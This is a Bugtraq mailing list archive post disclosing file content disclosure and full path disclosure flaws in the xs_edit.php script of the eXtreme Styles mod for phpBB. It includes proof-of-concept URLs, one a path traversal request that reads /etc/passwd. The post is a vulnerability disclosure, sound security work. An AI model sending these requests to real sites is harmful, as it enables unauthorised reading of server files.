Bugtraq mailing list archives
eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities
From: tommie1 () adelphia net
Date: 3 Dec 2005 13:29:02 -0000
eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities ==================================================== http://www.phpbbstyles.com/ Description =========== These vulnerabilities could allow an attacker that has gained administrative access view file content on the system. 1. Remote File Content Disclosure ======================= In xs_edit.php, the "edit" request field is not properly sanitized. 2. Full Path Disclosure ======================= In xs_edit.php, the "viewbackup" request field is not properly sanitized. Proof of Concept ================ 1. http://forum/admin/xs_edit.php?edit=../../../../etc/passwd 2. http://forum/admin/xs_edit.php?edit=&viewbackup=1 -------------- http://wtf.bz/
Current thread:
- eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities tommie1 (Dec 03)
- <Possible follow-ups>
- eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities tommie1 (Dec 03)